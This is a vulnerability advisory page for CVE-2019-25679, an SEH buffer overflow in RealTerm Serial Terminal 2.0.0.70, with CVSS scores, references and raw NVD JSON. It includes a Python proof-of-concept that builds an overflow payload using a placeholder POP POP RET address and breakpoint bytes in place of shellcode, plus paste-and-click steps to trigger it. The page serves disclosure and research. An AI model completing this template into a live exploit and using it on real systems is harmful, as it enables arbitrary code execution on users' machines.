Security Vulnerability Report
CVE-2019-25679 CVSS 7.8 HIGH

CVE-2019-25679

Published: 2026-04-05 21:16:46
Last Modified: 2026-04-20 17:48:37

Description

RealTerm Serial Terminal 2.0.0.70 contains a structured exception handling (SEH) buffer overflow vulnerability in the Echo Port tab that allows local attackers to execute arbitrary code by supplying a malicious payload. Attackers can craft a buffer overflow payload with a POP POP RET gadget chain and shellcode that triggers code execution when pasted into the Port field and the Change button is clicked.

CVSS Details

CVSS Score: 7.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:crun:realterm:2.0.0.70:*:*:*:*:*:*:* - VULNERABLE
RealTerm Serial Terminal 2.0.0.70

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
# PoC for CVE-2019-25679 - RealTerm Serial Terminal SEH Buffer Overflow
# This script generates a malicious payload to trigger the vulnerability.

import sys

def generate_payload():
    # Buffer padding to reach SEH structure (Hypothetical offset)
    # Exact offset requires debugging, this demonstrates the structure
    padding = b"A" * 1000

    # Next SEH: Jump short 6 bytes to skip SEH handler and land in shellcode
    next_seh = b"\xeb\x06\x90\x90"

    # SEH: Address of POP POP RET instruction
    # This address must be a valid address from a loaded module (e.g., OS DLL or App DLL)
    # Placeholder used here as exact address depends on system version
    seh_handler = b"\xAA\xBB\xCC\xDD"

    # Shellcode: Example (e.g., calc.exe or bind shell)
    # Real shellcode would be generated by msfvenom
    shellcode = b"\xCC" * 500

    payload = padding + next_seh + seh_handler + shellcode
    return payload

if __name__ == "__main__":
    print("[+] Generating payload for CVE-2019-25679...")
    payload = generate_payload()
    print(f"[+] Payload length: {len(payload)} bytes")
    print("[+] Copy the raw bytes below and paste into the 'Port' field in RealTerm Echo Port tab, then click 'Change'.")
    print(payload.decode('latin-1'))

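References

https://realterm.sourceforge.io/ (Product)
https://sourceforge.net/projects/realterm/files/ (Product)
https://www.exploit-db.com/exploits/46441 (Exploit, VDB Entry)
https://www.vulncheck.com/advisories/realterm-serial-terminal-buffer-overflow-seh (Third Party Advisory)
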
Raw JSON Data

JSON
{"cve": {"id": "CVE-2019-25679", "sourceIdentifier": "[email protected]", "published": "2026-04-05T21:16:46.127", "lastModified": "2026-04-20T17:48:36.967", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "RealTerm Serial Terminal 2.0.0.70 contains a structured exception handling (SEH) buffer overflow vulnerability in the Echo Port tab that allows local attackers to execute arbitrary code by supplying a malicious payload. Attackers can craft a buffer overflow payload with a POP POP RET gadget chain and shellcode that triggers code execution when pasted into the Port field and the Change button is clicked."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": 
"NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:crun:realterm:2.0.0.70:*:*:*:*:*:*:*", "matchCriteriaId": "CBB4049D-EE6D-4CA8-B20B-5F32A28157EE"}]}]}], "references": [{"url": "https://realterm.sourceforge.io/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://sourceforge.net/projects/realterm/files/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/46441", "source": "[email protected]", "tags": ["Exploit", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/realterm-serial-terminal-buffer-overflow-seh", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}